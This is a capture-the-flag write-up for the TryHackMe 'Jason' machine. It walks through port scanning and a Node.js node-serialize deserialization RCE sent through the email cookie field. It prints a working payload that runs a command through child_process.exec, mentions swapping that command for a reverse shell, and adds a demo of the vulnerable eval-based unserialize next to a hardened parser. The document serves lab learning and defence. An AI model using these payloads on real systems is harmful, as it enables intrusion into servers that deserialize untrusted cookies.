Jason
Last updated
mkdir ~/Documents/TryHackMe/eJPT/Jason
cd ~/Documents/TryHackMe/eJPT/Jason
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}
export IP=10.10.204.167
First, scan the machine for open ports with rustscan, passing the service and script scan flags through to nmap.
rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init
I found only the ssh and http ports open, so let's enumerate the http port. After some minutes of fuzzing I found nothing, so I went to the website and looked at the request/response headers.
For every POST you make on the website, it sets a session cookie. Whatever we pass as the email seems to get serialized, then deserialized and rendered back on the page.
I found an explanation of how to exploit this kind of Node.js deserialization.
First I tried to confirm command execution with a simple ping back to my machine (10.8.113.25). The payload below needs to be serialized with node-serialize:
// Object whose only property is a function. node-serialize stores the function's
// source as a string prefixed with the _$$ND_FUNC$$_ marker so it can be rebuilt
// (via eval) when the application unserializes it.
var y = {
    rce : function(){
        require('child_process').exec('ping -c 3 10.8.113.25', function(error, stdout, stderr) { console.log(stdout) });
    },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
node script.js
Serialized:
{"rce":"_$$ND_FUNC$$_function(){\n require('child_process').exec('ping -c 3 10.8.113.25', function(error, stdout, stderr) { console.log(stdout) });\n }"}
The key also has to be renamed from rce to email, since that is the field the application serializes and reads back. After confirming the ping, I swapped the ping for a reverse shell command.
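To see why the serialized function fires on the server without the application ever calling it, here is an added example (not the page's script and not the node-serialize module itself). It re-implements the _$$ND_FUNC$$_ marker format and the eval-based unserialize() that node-serialize is known for (CVE-2017-5941), then contrasts it with a hardened parser that treats the cookie as data only. The side-effect log executed stands in for the ping/reverse shell, and the email key, the "()" IIFE suffix and the safeUnserialize function are this example's own assumptions.

```javascript
// Added example: minimal re-implementation of node-serialize's function marker
// handling. This is NOT the node-serialize module; it mirrors its format
// ("_$$ND_FUNC$$_" + function source) and eval-based unserialize so the
// mechanics of the bug can be run offline without child_process.
const FUNCFLAG = '_$$ND_FUNC$$_';

// serialize(): functions are emitted as the marker followed by their source
// text; everything else is plain JSON.
function serialize(obj) {
  return JSON.stringify(obj, (key, value) =>
    typeof value === 'function' ? FUNCFLAG + value.toString() : value);
}

// unserialize(): the vulnerable side. Any string starting with the marker is
// handed to eval(), so attacker-controlled cookie content becomes code.
function unserialize(str) {
  const obj = JSON.parse(str);
  for (const key of Object.keys(obj)) {
    if (typeof obj[key] === 'string' && obj[key].startsWith(FUNCFLAG)) {
      obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');
    }
  }
  return obj;
}

// Side-effect log standing in for the ping / reverse shell; a real payload
// would call require('child_process').exec here (assumption for the demo).
const executed = [];

// buildPayload(): serialize a function under the "email" key, as the page
// describes. With invoke=true, "()" is appended after the function body so the
// eval above runs it as an IIFE; without it the function is only defined.
function buildPayload(invoke) {
  const y = { email: function () { executed.push('ran'); } };
  const s = serialize(y);
  return invoke ? s.replace(/\}"\}$/, '}()"}') : s;
}

// countExecutions(): feed a payload to the vulnerable unserialize() and report
// how many times the function body ran and what type the field ended up as.
function countExecutions(payloadStr) {
  executed.length = 0;
  const obj = unserialize(payloadStr);
  return { runs: executed.length, emailType: typeof obj.email };
}

// safeUnserialize(): hardened form. JSON.parse never evaluates code, and any
// field carrying the function marker is rejected instead of revived.
function safeUnserialize(str) {
  const obj = JSON.parse(str);
  for (const key of Object.keys(obj)) {
    if (typeof obj[key] === 'string' && obj[key].startsWith(FUNCFLAG)) {
      throw new Error('refusing to deserialize a function in field ' + key);
    }
  }
  return obj;
}

console.log('serialized payload:', buildPayload(true));
console.log('without "()":', countExecutions(buildPayload(false)));
console.log('with "()":   ', countExecutions(buildPayload(true)));
```

The practical check this illustrates: if your ping never arrives, first verify the serialized string ends with `}()` before the closing quote, because node-serialize only rebuilds the function when it sees the marker; it is the appended `()` that makes eval() invoke it during unserialize.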